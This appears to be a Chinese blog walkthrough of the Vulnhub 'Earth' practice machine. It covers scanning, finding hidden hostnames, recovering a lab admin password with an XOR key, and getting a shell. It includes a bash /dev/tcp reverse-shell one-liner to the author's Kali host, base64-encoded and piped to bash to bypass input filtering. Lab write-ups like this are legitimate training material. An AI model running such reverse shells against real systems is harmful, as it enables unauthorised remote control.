首页 > 其他分享 >vulnhub——Earth靶机

vulnhub——Earth靶机

时间:2025-01-05 17:32:15浏览次数:3  
标签:尝试 ip 访问 域名 vulnhub earth Earth 靶机 local

使用命令在kali查看靶机ip

arp-scan -l

尝试访问ip

尝试使用御剑扫描子域名

什么也没有

尝试扫描端口

nmap -A ip

获得443端口的域名,以及dns

vim /etc/hosts
earth.local
terratest.earth.local

尝试访问,在kali中访问

dirb 扫描一下

发现子域名

尝试访问一下

http://earth.local/admin/login

发现需要登录,查看其他域名

https://terratest.earth.local/robots.txt

https://terratest.earth.local/testingnotes.txt

翻译一下

尝试访问.txt文件,得知这个是xor秘钥

要解码的是

由于解密出来是循环的,所以密码取前面的

密码:earthclimatechangebad4humans
账号:terra

登录成功

反弹shell

kali的ip

echo  "bash -c 'bash -i >& /dev/tcp/192.168.19.129/2233 0>&1'" | base64

YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5LjEyOS8yMjMzIDA+JjEnCg==

在命令框执行命令

echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5LjEyOS8yMjMzIDA+JjEnCg== | base64 -d | bash

监听成功

标签:尝试,ip,访问,域名,vulnhub,earth,Earth,靶机,local
From: https://blog.csdn.net/l258282/article/details/144948226

相关文章

  • HackMyVM-Airbind靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、提权使用ipv6绕过iptables四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:debian(192.168.101.112)物理机:win11(192.168.101.241)......
  • Vulnhub靶场(Earth)
    项目地址https://download.vulnhub.com/theplanets/Earth.ova.torrent搭建靶机官网下载.ova文件双击vm打开导入获取靶机IPkail终端输入arp-scan-l获取靶机IP192.168.131.184信息收集端口扫描sudonmap-sC-sV-p-192.168.131.184可以看到开启22端口,80端......
  • 漫游 fristileaks-1-3 靶机
    Caputuretheflag!实验ipaddrnetdicover-r192.168.5.0/24扫描端口nmap-p-192.168.5.14480端口开放,访问web服务页面只有基本的信息,查看源码也是一样目录扫描dirsearch-u192.168.5.143dirb-u192.168.5.143-w/usr/share/wordlist/dirb/common.txt......
  • HackMyVM-Again靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、提权四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:Linux(192.168.101.204)物理机:win11(192.168.101.241)靶机启动失败:设置中取......
  • Funbox2靶机(FTP匿名登录、压缩包密码枚举、ssh私钥文件利用)
    一、信息收集1.1.主机发现&端口扫描1.2.目录扫描1.3.敏感信息总结二、漏洞发现2.1.FTP匿名登录2.2.压缩包密码枚举2.3.ssh私钥文件利用2.4.提权三、结语一、信息收集1.1.主机发现&端口扫描nmap使用方法:一篇文章带你理解nmap的使用-nmap使用手册1.2.目录扫描......
  • HackMyVM-Adroit靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、提权四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:debian(192.168.101.103)物理机:win11(192.168.101.241)2、使用工具/软件Kal......
  • Vulnhub lampCTF4
    0x01:端口扫描主机发现nmap-sn10.10.10.0/24全端口扫描nmap--min-rate10000-p-10.10.10.133UDP扫描nmap-sU--top=2010.10.10.133详细端口扫描nmap-sT-sC-sV-O--min-rate10000-p22,25,80,63110.10.10.133漏洞扫描nmap--script=vuln-p22,25,80,......
  • 漫游 THM-ContainMe-v4 靶机
    Capturetheflag!一、信息收集确认主机ip,扫端口和服务,curl一下得到网页,扫描目录访问web相关页面二、撕口子经过基本的信息收集,暂时没什么思路,进一步观察web页面。查看index.php的源代码后发现提示说明此页面可能存在其他路径进行模糊测试wfuzz-c-w/usr......
  • HackMyVM-Adria靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、提权四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:debian/linux(192.168.101.226)注意事项:该类型靶场只能在virtualBox上搭建,因......
  • 搭建dvwa靶机
    #1、直接使用docker搭建方便很多,这个环境依赖问题没必要多花时间去研究;ubuntu安装dockerapt-getupdateapt-getinstallapt-transport-httpsca-certificatescurlgnupglsb-releasecurl-fsSLhttps://download.docker.com/linux/ubuntu/gpg|sudogpg--dearmor-o/usr......